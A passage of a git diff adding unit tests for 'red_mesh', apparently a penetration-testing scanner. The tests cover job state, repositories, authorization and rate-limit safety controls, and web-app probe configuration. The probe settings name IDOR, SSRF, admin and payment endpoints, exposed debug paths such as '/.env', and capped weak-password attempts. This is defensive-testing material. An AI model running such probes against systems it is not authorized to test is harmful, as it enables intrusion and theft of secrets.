test_reconcile_job_workers_marks_unseen_when_live_revision_mismatch(self): + owner = self._make_owner() + job_specs = { + "job_id": "job-1", + "job_pass": 2, + "workers": { + "worker-A": {"start_port": 1, "end_port": 10, "assignment_revision": 3}, + }, + } + live_payloads = { + "job-1:worker-A": { + "job_id": "job-1", + "worker_addr": "worker-A", + "pass_nr": 2, + "assignment_revision_seen": 2, + "progress": 40.0, + "phase": "service_probes", + "ports_scanned": 4, + "ports_total": 10, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + + reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0) + + self.assertEqual(reconciled["worker-A"]["worker_state"], "unseen") + self.assertEqual(reconciled["worker-A"]["ignored_live_reason"], "revision_mismatch") diff --git a/extensions/business/cybersec/red_mesh/tests/test_regressions.py b/extensions/business/cybersec/red_mesh/tests/test_regressions.py new file mode 100644 index 00000000..5ae9badb --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_regressions.py @@ -0,0 +1,108 @@ +import json +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.services.resilience import run_bounded_retry +from extensions.business.cybersec.red_mesh.services.triage import _merge_triage_into_archive_dict + +from .conftest import mock_plugin_modules + + +class TestRegressionScenarios(unittest.TestCase): + + def _get_plugin_class(self): + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_archive_retry_after_partial_failure(self): + """Bounded retry recovers a transient archive verification failure.""" + host = MagicMock() + host.P = MagicMock() + host._log_audit_event = MagicMock() + attempts = {"count": 0} + + def _operation(): + attempts["count"] += 1 + if attempts["count"] < 2: + return None + return {"job_id": "job-1"} + + result = run_bounded_retry( + host, + "archive_verify", + 3, + _operation, + is_success=lambda payload: isinstance(payload, dict) and payload.get("job_id") == "job-1", + ) + + self.assertEqual(result["job_id"], "job-1") + self.assertEqual(attempts["count"], 2) + host._log_audit_event.assert_any_call("retry_attempt", {"action": "archive_verify", "attempt": 1, "attempts": 3}) + + def test_stale_write_conflict_detection_regression(self): + """Revision mismatch still produces a stale-write audit event.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hget.return_value = {"job_id": "job-1", "job_revision": 5} + plugin.chainstore_hset = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.P = MagicMock() + + updated = Plugin._write_job_record(plugin, "job-1", {"job_id": "job-1", "job_revision": 3}, context="regression") + + self.assertEqual(updated["job_revision"], 6) + plugin._log_audit_event.assert_called_once() + + def test_triage_merge_does_not_mutate_archive_source(self): + """Triage view merging must not rewrite the immutable archive payload.""" + archive = { + "job_id": "job-1", + "passes": [{"findings": [{"finding_id": "f-1", "title": "Issue"}]}], + "ui_aggregate": {"top_findings": [{"finding_id": "f-1", "title": "Issue"}]}, + } + triage_map = {"f-1": {"status": "accepted_risk"}} + + merged = _merge_triage_into_archive_dict(archive, triage_map) + + self.assertEqual(merged["passes"][0]["findings"][0]["triage"]["status"], "accepted_risk") + self.assertNotIn("triage", archive["passes"][0]["findings"][0]) + + def test_multi_node_completion_order_variance_keeps_archive_query_stable(self): + """Equivalent job listings should remain stable across completion-order variance.""" + Plugin = self._get_plugin_class() + jobs = { + "job-1": { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 2, + "run_mode": "SINGLEPASS", + "launcher": "node-a", + "launcher_alias": "node-a", + "target": "example.com", + "scan_type": "network", + "target_url": "", + "task_name": "Test", + "start_port": 1, + "end_port": 10, + "date_created": 1.0, + "job_config_cid": "QmConfig", + "workers": { + "node-a": {"finished": True}, + "node-b": {"finished": True}, + }, + "timeline": [], + "pass_reports": [{"pass_nr": 1, "report_cid": "Qm1"}, {"pass_nr": 2, "report_cid": "Qm2"}], + }, + } + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = jobs + plugin._normalize_job_record = MagicMock(side_effect=lambda key, value: (key, value)) + plugin._get_all_network_jobs = lambda: Plugin._get_all_network_jobs(plugin) + + first = Plugin.list_network_jobs(plugin) + second = Plugin.list_network_jobs(plugin) + + self.assertEqual(json.dumps(first, sort_keys=True), json.dumps(second, sort_keys=True)) diff --git a/extensions/business/cybersec/red_mesh/tests/test_repositories.py b/extensions/business/cybersec/red_mesh/tests/test_repositories.py new file mode 100644 index 00000000..0ded925f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_repositories.py @@ -0,0 +1,254 @@ +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.models import ( + CStoreJobRunning, JobArchive, JobConfig, PassReport, WorkerProgress, CStoreWorker, +) +from extensions.business.cybersec.red_mesh.repositories import ArtifactRepository, JobStateRepository + + +class TestJobStateRepository(unittest.TestCase): + + def _make_owner(self): + owner = MagicMock() + owner.cfg_instance_id = "test-instance" + return owner + + def test_job_state_repository_reads_and_writes_jobs(self): + owner = self._make_owner() + repo = JobStateRepository(owner) + + repo.get_job("job-1") + owner.chainstore_hget.assert_called_once_with(hkey="test-instance", key="job-1") + + repo.put_job("job-1", {"job_id": "job-1"}) + owner.chainstore_hset.assert_called_once_with(hkey="test-instance", key="job-1", value={"job_id": "job-1"}) + + def test_job_state_repository_uses_live_namespace(self): + owner = self._make_owner() + repo = JobStateRepository(owner) + + repo.list_live_progress() + owner.chainstore_hgetall.assert_called_once_with(hkey="test-instance:live") + + repo.delete_live_progress("job-1:node-A") + owner.chainstore_hset.assert_called_once_with(hkey="test-instance:live", key="job-1:node-A", value=None) + + def test_job_state_repository_supports_typed_running_jobs(self): + owner = self._make_owner() + owner.chainstore_hget.return_value = { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-a", + "launcher_alias": "node-a", + "target": "example.com", + "task_name": "Test", + "start_port": 1, + "end_port": 10, + "date_created": 1.0, + "job_config_cid": "QmConfig", + "workers": {}, + "timeline": [], + "pass_reports": [], + } + repo = JobStateRepository(owner) + + running = repo.get_running_job("job-1") + + self.assertIsInstance(running, CStoreJobRunning) + persisted = repo.put_running_job(running) + self.assertEqual(persisted["job_id"], "job-1") + self.assertEqual(persisted["scan_type"], "network") + + def test_job_state_repository_supports_typed_live_progress(self): + owner = self._make_owner() + repo = JobStateRepository(owner) + progress = WorkerProgress( + job_id="job-1", + worker_addr="node-a", + pass_nr=1, + assignment_revision_seen=2, + progress=25.0, + phase="port_scan", + scan_type="network", + phase_index=1, + total_phases=5, + ports_scanned=10, + ports_total=40, + open_ports_found=[22], + completed_tests=["probe"], + updated_at=1.0, + started_at=0.5, + first_seen_live_at=0.5, + last_seen_at=1.0, + ) + + persisted = repo.put_live_progress_model(progress) + + self.assertEqual(persisted["job_id"], "job-1") + self.assertEqual(persisted["assignment_revision_seen"], 2) + owner.chainstore_hset.assert_called_once() + + def test_cstore_worker_roundtrip_preserves_assignment_metadata(self): + worker = CStoreWorker( + start_port=1, + end_port=100, + assignment_revision=3, + assigned_at=10.0, + reannounce_count=2, + last_reannounce_at=12.0, + retry_reason="startup_timeout", + terminal_reason="unreachable", + error="worker missing", + unreachable_at=20.0, + ) + + worker2 = CStoreWorker.from_dict(worker.to_dict()) + + self.assertEqual(worker2.assignment_revision, 3) + self.assertEqual(worker2.assigned_at, 10.0) + self.assertEqual(worker2.reannounce_count, 2) + self.assertEqual(worker2.last_reannounce_at, 12.0) + self.assertEqual(worker2.retry_reason, "startup_timeout") + self.assertEqual(worker2.terminal_reason, "unreachable") + self.assertEqual(worker2.error, "worker missing") + self.assertEqual(worker2.unreachable_at, 20.0) + + def test_job_state_repository_put_job_coerces_running_job_shape(self): + owner = self._make_owner() + repo = JobStateRepository(owner) + + payload = repo.put_job("job-1", { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-a", + "launcher_alias": "node-a", + "target": "example.com", + "scan_type": "webapp", + "target_url": "https://example.com/app", + "task_name": "Test", + "start_port": 443, + "end_port": 443, + "date_created": 1.0, + "job_config_cid": "QmConfig", + "workers": {}, + "timeline": [], + "pass_reports": [], + }) + + self.assertEqual(payload["scan_type"], "webapp") + self.assertEqual(payload["target_url"], "https://example.com/app") + + def test_job_state_repository_supports_finding_triage(self): + owner = self._make_owner() + owner.chainstore_hget.side_effect = [ + {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "note": "known issue"}, + [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 10.0}], + ] + owner.chainstore_hgetall.side_effect = [ + {"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}}, + {"job-1:f-1": [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 10.0}]}, + ] + repo = JobStateRepository(owner) + + triage = repo.get_finding_triage_model("job-1", "f-1") + audit = repo.get_finding_triage_audit("job-1", "f-1") + repo.delete_job_triage("job-1") + + self.assertEqual(triage.status, "accepted_risk") + self.assertEqual(audit[0]["finding_id"], "f-1") + self.assertEqual(owner.chainstore_hset.call_count, 2) + + +class TestArtifactRepository(unittest.TestCase): + + def _make_owner(self): + owner = MagicMock() + owner.r1fs = MagicMock() + return owner + + def test_artifact_repository_reads_and_writes_json(self): + owner = self._make_owner() + repo = ArtifactRepository(owner) + + repo.get_json("QmCID") + owner.r1fs.get_json.assert_called_once_with("QmCID") + + repo.put_json({"job_id": "job-1"}, show_logs=False) + owner.r1fs.add_json.assert_called_once_with({"job_id": "job-1"}, show_logs=False) + + def test_artifact_repository_passes_secret_for_protected_json(self): + owner = self._make_owner() + repo = ArtifactRepository(owner) + + repo.get_json("QmCID", secret="node-secret-key") + owner.r1fs.get_json.assert_called_once_with("QmCID", secret="node-secret-key") + + repo.put_json({"job_id": "job-1"}, show_logs=False, secret="node-secret-key") + owner.r1fs.add_json.assert_called_once_with( + {"job_id": "job-1"}, + show_logs=False, + secret="node-secret-key", + ) + + def test_artifact_repository_job_config_helper(self): + owner = self._make_owner() + repo = ArtifactRepository(owner) + + repo.get_job_config({"job_config_cid": "QmConfig"}) + owner.r1fs.get_json.assert_called_once_with("QmConfig") + + def test_artifact_repository_delete_is_guarded_on_empty_cid(self): + owner = self._make_owner() + repo = ArtifactRepository(owner) + + self.assertFalse(repo.delete("")) + owner.r1fs.delete_file.assert_not_called() + + def test_artifact_repository_supports_typed_models(self): + owner = self._make_owner() + repo = ArtifactRepository(owner) + owner.r1fs.get_json.return_value = { + "target": "example.com", + "start_port": 1, + "end_port": 10, + "exceptions": [], + "distribution_strategy": "SLICE", + "port_order": "SEQUENTIAL", + "nr_local_workers": 2, + "enabled_features": [], + "excluded_features": [], + "run_mode": "SINGLEPASS", + } + + job_config = repo.get_job_config_model({"job_config_cid": "QmConfig"}) + + self.assertIsInstance(job_config, JobConfig) + + pass_report = PassReport( + pass_nr=1, + date_started=1.0, + date_completed=2.0, + duration=1.0, + aggregated_report_cid="QmAgg", + worker_reports={}, + ) + repo.put_pass_report(pass_report) + + archive = JobArchive( + job_id="job-1", + job_config=job_config.to_dict(), + timeline=[], + passes=[], + ui_aggregate={"total_open_ports": [], "total_services": 0, "total_findings": 0}, + duration=1.0, + date_created=1.0, + date_completed=2.0, + ) + repo.put_archive(archive) + + self.assertEqual(owner.r1fs.add_json.call_count, 2) diff --git a/extensions/business/cybersec/red_mesh/tests/test_safety.py b/extensions/business/cybersec/red_mesh/tests/test_safety.py new file mode 100644 index 00000000..8a1d0a46 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_safety.py @@ -0,0 +1,107 @@ +"""Tests for SafetyControls.""" + +import time +import unittest + +from extensions.business.cybersec.red_mesh.graybox.safety import SafetyControls +from extensions.business.cybersec.red_mesh.constants import ( + GRAYBOX_DEFAULT_DELAY, + GRAYBOX_MAX_WEAK_ATTEMPTS, +) + + +class TestSafetyControls(unittest.TestCase): + + def test_clamp_attempts_respects_cap(self): + """clamp_attempts enforces hard cap.""" + self.assertEqual(SafetyControls.clamp_attempts(5), 5) + self.assertEqual(SafetyControls.clamp_attempts(100), GRAYBOX_MAX_WEAK_ATTEMPTS) + self.assertEqual(SafetyControls.clamp_attempts(0), 0) + self.assertEqual(SafetyControls.clamp_attempts(-1), 0) + + def test_validate_target_no_auth(self): + """Unauthorized scan returns error.""" + err = SafetyControls.validate_target("http://example.com", authorized=False) + self.assertIsNotNone(err) + self.assertIn("not authorized", err.lower()) + + def test_validate_target_blocked(self): + """Public domains are blocked.""" + err = SafetyControls.validate_target("https://google.com", authorized=True) + self.assertIsNotNone(err) + self.assertIn("public service", err.lower()) + + def test_validate_target_blocked_subdomain(self): + """Subdomains of blocked domains are also blocked.""" + err = SafetyControls.validate_target("https://mail.google.com", authorized=True) + self.assertIsNotNone(err) + + def test_validate_target_ok(self): + """Valid URL + authorized returns None.""" + err = SafetyControls.validate_target("https://myapp.internal.com", authorized=True) + self.assertIsNone(err) + + def test_validate_target_invalid_url(self): + """Invalid URL returns error.""" + err = SafetyControls.validate_target("not-a-url", authorized=True) + self.assertIsNotNone(err) + + def test_validate_target_bad_scheme(self): + """Non-HTTP scheme returns error.""" + err = SafetyControls.validate_target("ftp://example.com", authorized=True) + self.assertIsNotNone(err) + self.assertIn("scheme", err.lower()) + + def test_sanitize_error_password(self): + """Password values are scrubbed.""" + msg = SafetyControls.sanitize_error('Error: password="secret123" is wrong') + self.assertNotIn("secret123", msg) + self.assertIn("***", msg) + + def test_sanitize_error_token(self): + """Token values are scrubbed.""" + msg = SafetyControls.sanitize_error("token=abc123def in header") + self.assertNotIn("abc123def", msg) + self.assertIn("***", msg) + + def test_sanitize_error_secret(self): + """Secret values are scrubbed.""" + msg = SafetyControls.sanitize_error("secret=mysecretvalue leaked") + self.assertNotIn("mysecretvalue", msg) + self.assertIn("***", msg) + + def test_sanitize_error_preserves_normal_text(self): + """Normal text without credentials is preserved.""" + msg = SafetyControls.sanitize_error("Connection refused on port 443") + self.assertEqual(msg, "Connection refused on port 443") + + def test_throttle_delay(self): + """Requests are spaced by min_delay.""" + sc = SafetyControls(request_delay=0.05, target_is_local=True) + sc.throttle() + t1 = time.time() + sc.throttle() + t2 = time.time() + self.assertGreaterEqual(t2 - t1, 0.04) # small tolerance + + def test_min_delay_enforced_non_local(self): + """Non-local target gets GRAYBOX_DEFAULT_DELAY minimum.""" + sc = SafetyControls(request_delay=0.01, target_is_local=False) + self.assertEqual(sc._request_delay, GRAYBOX_DEFAULT_DELAY) + + def test_min_delay_local_bypass(self): + """Local target allows lower delay.""" + sc = SafetyControls(request_delay=0.01, target_is_local=True) + self.assertEqual(sc._request_delay, 0.01) + + def test_is_local_target(self): + """Recognizes localhost variants.""" + self.assertTrue(SafetyControls.is_local_target("http://localhost:8000")) + self.assertTrue(SafetyControls.is_local_target("http://127.0.0.1:3000")) + self.assertTrue(SafetyControls.is_local_target("http://[::1]:8080")) + self.assertTrue(SafetyControls.is_local_target("http://host.docker.internal")) + self.assertFalse(SafetyControls.is_local_target("http://example.com")) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_state_machine.py b/extensions/business/cybersec/red_mesh/tests/test_state_machine.py new file mode 100644 index 00000000..f2f925b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_state_machine.py @@ -0,0 +1,59 @@ +import unittest + +from extensions.business.cybersec.red_mesh.constants import ( + JOB_STATUS_ANALYZING, + JOB_STATUS_COLLECTING, + JOB_STATUS_FINALIZED, + JOB_STATUS_FINALIZING, + JOB_STATUS_RUNNING, + JOB_STATUS_SCHEDULED_FOR_STOP, + JOB_STATUS_STOPPED, +) +from extensions.business.cybersec.red_mesh.services.state_machine import ( + can_transition_job_status, + is_intermediate_job_status, + is_terminal_job_status, + set_job_status, +) + + +class TestJobStateMachine(unittest.TestCase): + + def test_allows_linear_finalization_flow(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + set_job_status(job_specs, JOB_STATUS_COLLECTING) + set_job_status(job_specs, JOB_STATUS_ANALYZING) + set_job_status(job_specs, JOB_STATUS_FINALIZING) + set_job_status(job_specs, JOB_STATUS_FINALIZED) + + self.assertEqual(job_specs["job_status"], JOB_STATUS_FINALIZED) + self.assertTrue(is_terminal_job_status(job_specs["job_status"])) + + def test_allows_continuous_jobs_to_return_to_running_after_finalizing(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + set_job_status(job_specs, JOB_STATUS_COLLECTING) + set_job_status(job_specs, JOB_STATUS_FINALIZING) + set_job_status(job_specs, JOB_STATUS_RUNNING) + + self.assertEqual(job_specs["job_status"], JOB_STATUS_RUNNING) + + def test_rejects_invalid_transition(self): + job_specs = {"job_status": JOB_STATUS_RUNNING} + + with self.assertRaisesRegex(ValueError, "Invalid job status transition"): + set_job_status(job_specs, JOB_STATUS_FINALIZED) + + def test_hard_stop_is_allowed_from_intermediate_states(self): + self.assertTrue(can_transition_job_status(JOB_STATUS_COLLECTING, JOB_STATUS_STOPPED)) + self.assertTrue(can_transition_job_status(JOB_STATUS_ANALYZING, JOB_STATUS_STOPPED)) + self.assertTrue(can_transition_job_status(JOB_STATUS_FINALIZING, JOB_STATUS_STOPPED)) + + def test_state_classification_helpers(self): + self.assertTrue(is_intermediate_job_status(JOB_STATUS_COLLECTING)) + self.assertTrue(is_intermediate_job_status(JOB_STATUS_ANALYZING)) + self.assertTrue(is_intermediate_job_status(JOB_STATUS_FINALIZING)) + self.assertFalse(is_intermediate_job_status(JOB_STATUS_RUNNING)) + self.assertFalse(is_terminal_job_status(JOB_STATUS_SCHEDULED_FOR_STOP)) + self.assertTrue(is_terminal_job_status(JOB_STATUS_STOPPED)) diff --git a/extensions/business/cybersec/red_mesh/tests/test_target_config.py b/extensions/business/cybersec/red_mesh/tests/test_target_config.py new file mode 100644 index 00000000..7ac8bb78 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_target_config.py @@ -0,0 +1,192 @@ +"""Tests for GrayboxTargetConfig and typed endpoint models.""" + +import unittest + +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, + IdorEndpoint, + AdminEndpoint, + WorkflowEndpoint, + SsrfEndpoint, + AccessControlConfig, + MisconfigConfig, + InjectionConfig, + BusinessLogicConfig, + DiscoveryConfig, + COMMON_CSRF_FIELDS, +) +from extensions.business.cybersec.red_mesh.constants import ( + ScanType, + GRAYBOX_PROBE_REGISTRY, +) + + +class TestGrayboxTargetConfig(unittest.TestCase): + + def test_defaults(self): + """All sections empty by default, login_path is /auth/login/.""" + cfg = GrayboxTargetConfig() + self.assertEqual(cfg.login_path, "/auth/login/") + self.assertEqual(cfg.logout_path, "/auth/logout/") + self.assertEqual(cfg.username_field, "username") + self.assertEqual(cfg.password_field, "password") + self.assertEqual(cfg.csrf_field, "") + self.assertEqual(cfg.access_control.idor_endpoints, []) + self.assertEqual(cfg.access_control.admin_endpoints, []) + self.assertEqual(cfg.injection.ssrf_endpoints, []) + self.assertEqual(cfg.business_logic.workflow_endpoints, []) + self.assertEqual(cfg.discovery.max_pages, 50) + self.assertEqual(cfg.discovery.max_depth, 3) + + def test_from_dict_roundtrip(self): + """Round-trip to_dict/from_dict with sectioned format.""" + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=[IdorEndpoint(path="/api/records/{id}/", test_ids=[1, 2, 3])], + admin_endpoints=[AdminEndpoint(path="/api/admin/export/")], + ), + injection=InjectionConfig( + ssrf_endpoints=[SsrfEndpoint(path="/api/fetch/", param="url")], + ), + business_logic=BusinessLogicConfig( + workflow_endpoints=[WorkflowEndpoint(path="/api/pay/", method="POST")], + ), + discovery=DiscoveryConfig(scope_prefix="/api/", max_pages=100), + login_path="/login/", + csrf_field="csrf_token", + ) + d = cfg.to_dict() + restored = GrayboxTargetConfig.from_dict(d) + self.assertEqual(restored.login_path, "/login/") + self.assertEqual(restored.csrf_field, "csrf_token") + self.assertEqual(len(restored.access_control.idor_endpoints), 1) + self.assertEqual(restored.access_control.idor_endpoints[0].path, "/api/records/{id}/") + self.assertEqual(restored.access_control.idor_endpoints[0].test_ids, [1, 2, 3]) + self.assertEqual(restored.injection.ssrf_endpoints[0].param, "url") + self.assertEqual(restored.discovery.scope_prefix, "/api/") + self.assertEqual(restored.discovery.max_pages, 100) + + def test_from_dict_ignores_unknown(self): + """Extra keys in dict don't raise.""" + cfg = GrayboxTargetConfig.from_dict({"unknown_key": "value", "nested": {"foo": 1}}) + self.assertEqual(cfg.login_path, "/auth/login/") + + def test_from_dict_empty(self): + """Empty dict produces all defaults.""" + cfg = GrayboxTargetConfig.from_dict({}) + self.assertEqual(cfg.login_path, "/auth/login/") + self.assertEqual(cfg.access_control.idor_endpoints, []) + + +class TestTypedEndpoints(unittest.TestCase): + + def test_idor_endpoint_from_dict(self): + """IdorEndpoint constructs from dict correctly.""" + ep = IdorEndpoint.from_dict({"path": "/api/records/{id}/", "test_ids": [5, 10]}) + self.assertEqual(ep.path, "/api/records/{id}/") + self.assertEqual(ep.test_ids, [5, 10]) + self.assertEqual(ep.owner_field, "owner") + self.assertEqual(ep.id_param, "id") + + def test_idor_endpoint_missing_path(self): + """IdorEndpoint raises on missing required 'path' field.""" + with self.assertRaises(KeyError): + IdorEndpoint.from_dict({"test_ids": [1, 2]}) + + def test_admin_endpoint_defaults(self): + """AdminEndpoint defaults method to GET.""" + ep = AdminEndpoint.from_dict({"path": "/admin/"}) + self.assertEqual(ep.method, "GET") + self.assertEqual(ep.content_markers, []) + + def test_workflow_endpoint_from_dict(self): + """WorkflowEndpoint constructs correctly.""" + ep = WorkflowEndpoint.from_dict({ + "path": "/api/pay/", + "method": "POST", + "expected_guard": "403", + }) + self.assertEqual(ep.path, "/api/pay/") + self.assertEqual(ep.method, "POST") + self.assertEqual(ep.expected_guard, "403") + + def test_ssrf_endpoint_defaults(self): + """SsrfEndpoint defaults param to 'url'.""" + ep = SsrfEndpoint.from_dict({"path": "/api/fetch/"}) + self.assertEqual(ep.param, "url") + + def test_sections_independent(self): + """Adding to one section doesn't affect others.""" + cfg = GrayboxTargetConfig( + access_control=AccessControlConfig( + idor_endpoints=[IdorEndpoint(path="/a/")], + ), + ) + self.assertEqual(len(cfg.access_control.idor_endpoints), 1) + self.assertEqual(cfg.injection.ssrf_endpoints, []) + self.assertEqual(cfg.business_logic.workflow_endpoints, []) + + def test_misconfig_default_paths(self): + """MisconfigConfig has sensible default debug paths.""" + cfg = MisconfigConfig() + self.assertIn("/.env", cfg.debug_paths) + self.assertIn("/actuator", cfg.debug_paths) + + def test_discovery_config_from_dict(self): + """DiscoveryConfig round-trips correctly.""" + dc = DiscoveryConfig.from_dict({"scope_prefix": "/app/", "max_pages": 25, "max_depth": 5}) + self.assertEqual(dc.scope_prefix, "/app/") + self.assertEqual(dc.max_pages, 25) + self.assertEqual(dc.max_depth, 5) + + +class TestScanTypeEnum(unittest.TestCase): + + def test_scan_type_values(self): + """ScanType.WEBAPP == 'webapp', ScanType.NETWORK == 'network'.""" + self.assertEqual(ScanType.WEBAPP, "webapp") + self.assertEqual(ScanType.NETWORK, "network") + self.assertEqual(ScanType.WEBAPP.value, "webapp") + + def test_scan_type_is_str(self): + """ScanType members are strings (str, Enum).""" + self.assertIsInstance(ScanType.WEBAPP, str) + self.assertIsInstance(ScanType.NETWORK, str) + + +class TestProbeRegistry(unittest.TestCase): + + def test_registry_structure(self): + """All entries have 'key' and 'cls' fields.""" + for entry in GRAYBOX_PROBE_REGISTRY: + self.assertIn("key", entry, f"Missing 'key' in registry entry: {entry}") + self.assertIn("cls", entry, f"Missing 'cls' in registry entry: {entry}") + + def test_registry_keys_only(self): + """Registry entries have exactly 'key' and 'cls' — capabilities live on probe class.""" + for entry in GRAYBOX_PROBE_REGISTRY: + self.assertEqual(set(entry.keys()), {"key", "cls"}, + f"Registry entry has extra keys: {entry}") + + def test_registry_has_expected_probes(self): + """Registry includes access_control, misconfig, injection, business_logic.""" + keys = [e["key"] for e in GRAYBOX_PROBE_REGISTRY] + self.assertIn("_graybox_access_control", keys) + self.assertIn("_graybox_misconfig", keys) + self.assertIn("_graybox_injection", keys) + self.assertIn("_graybox_business_logic", keys) + + +class TestCsrfFields(unittest.TestCase): + + def test_common_csrf_fields(self): + """COMMON_CSRF_FIELDS contains Django, Flask, Rails, Spring, Laravel.""" + self.assertIn("csrfmiddlewaretoken", COMMON_CSRF_FIELDS) + self.assertIn("csrf_token", COMMON_CSRF_FIELDS) + self.assertIn("authenticity_token", COMMON_CSRF_FIELDS) + self.assertIn("_csrf", COMMON_CSRF_FIELDS) + self.assertIn("_token", COMMON_CSRF_FIELDS) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_worker.py b/extensions/business/cybersec/red_mesh/tests/test_worker.py new file mode 100644 index 00000000..3be7b804 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_worker.py @@ -0,0 +1,827 @@ +"""Tests for GrayboxLocalWorker.""" + +import unittest +from unittest.mock import MagicMock, patch, PropertyMock + +from extensions.business.cybersec.red_mesh.graybox.worker import GrayboxLocalWorker +from extensions.business.cybersec.red_mesh.worker.base import BaseLocalWorker +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxEvidenceArtifact, GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models import ( + DiscoveryResult, + GrayboxCredentialSet, + GrayboxProbeContext, + GrayboxProbeDefinition, + GrayboxProbeRunResult, +) +from extensions.business.cybersec.red_mesh.constants import ( + ScanType, GRAYBOX_PROBE_REGISTRY, +) + + +def _make_job_config(**overrides): + cfg = MagicMock() + cfg.scan_type = "webapp" + cfg.target_url = "http://testapp.local:8000" + cfg.official_username = "admin" + cfg.official_password = "secret" + cfg.regular_username = "alice" + cfg.regular_password = "pass" + cfg.weak_candidates = None + cfg.max_weak_attempts = 5 + cfg.app_routes = None + cfg.verify_tls = True + cfg.target_config = None + cfg.allow_stateful_probes = False + cfg.excluded_features = [] + cfg.scan_min_delay = 0.0 + cfg.authorized = True + for k, v in overrides.items(): + setattr(cfg, k, v) + return cfg + + +def _make_worker(**overrides): + owner = MagicMock() + owner.P = MagicMock() + cfg = _make_job_config(**overrides) + with patch("extensions.business.cybersec.red_mesh.graybox.worker.SafetyControls"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.AuthManager"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.DiscoveryModule"): + worker = GrayboxLocalWorker( + owner=owner, + job_id="test-job-1", + target_url=cfg.target_url, + job_config=cfg, + local_id="1", + initiator="test-node", + ) + return worker + + +class TestBaseLocalWorkerIntegration(unittest.TestCase): + + def test_inherits_base(self): + """GrayboxLocalWorker inherits from BaseLocalWorker.""" + self.assertTrue(issubclass(GrayboxLocalWorker, BaseLocalWorker)) + + def test_start_inherited(self): + """start() is not redefined.""" + self.assertNotIn("start", GrayboxLocalWorker.__dict__) + + def test_stop_inherited(self): + """stop() is not redefined.""" + self.assertNotIn("stop", GrayboxLocalWorker.__dict__) + + def test_check_stopped_inherited(self): + """_check_stopped() is not redefined.""" + self.assertNotIn("_check_stopped", GrayboxLocalWorker.__dict__) + + def test_local_worker_id_format(self): + """local_worker_id starts with RM-.""" + worker = _make_worker() + self.assertTrue(worker.local_worker_id.startswith("RM-")) + + def test_initial_ports_is_list(self): + """initial_ports is a list.""" + worker = _make_worker() + self.assertIsInstance(worker.initial_ports, list) + self.assertEqual(worker.initial_ports, [8000]) + + def test_ports_scanned_is_list(self): + """state['ports_scanned'] is a list.""" + worker = _make_worker() + self.assertIsInstance(worker.state["ports_scanned"], list) + + +class TestStateShape(unittest.TestCase): + + def test_state_shape(self): + """State dict has all required keys.""" + worker = _make_worker() + required = [ + "job_id", "initiator", "target", "scan_type", "target_url", + "open_ports", "ports_scanned", "port_protocols", "service_info", + "web_tests_info", "correlation_findings", "graybox_results", + "completed_tests", "done", "canceled", + ] + for key in required: + self.assertIn(key, worker.state, f"Missing state key: {key}") + + def test_state_has_scan_type(self): + """state['scan_type'] == 'webapp'.""" + worker = _make_worker() + self.assertEqual(worker.state["scan_type"], "webapp") + + def test_graybox_results_populated(self): + """Findings stored in graybox_results, not web_tests_info.""" + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + worker._store_findings("_test_probe", [finding]) + self.assertIn("8000", worker.state["graybox_results"]) + self.assertIn("_test_probe", worker.state["graybox_results"]["8000"]) + self.assertEqual(worker.state["web_tests_info"], {}) + + +class TestStatus(unittest.TestCase): + + def test_get_status_scan_metrics_key(self): + """Status includes scan_metrics key.""" + worker = _make_worker() + status = worker.get_status() + self.assertIn("scan_metrics", status) + + def test_get_status_includes_scenario_stats(self): + """Status includes scenario_stats.""" + worker = _make_worker() + status = worker.get_status() + self.assertIn("scenario_stats", status) + + def test_get_status_merges_scenario_stats_into_scan_metrics(self): + """scan_metrics includes graybox scenario counters.""" + worker = _make_worker() + worker._store_findings("_test_probe", [GrayboxFinding( + scenario_id="TEST-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + )]) + status = worker.get_status() + self.assertEqual(status["scan_metrics"]["scenarios_total"], 1) + self.assertEqual(status["scan_metrics"]["scenarios_vulnerable"], 1) + + def test_get_status_for_aggregations(self): + """for_aggregations=True omits local_worker_id.""" + worker = _make_worker() + status = worker.get_status(for_aggregations=True) + self.assertNotIn("local_worker_id", status) + status_full = worker.get_status(for_aggregations=False) + 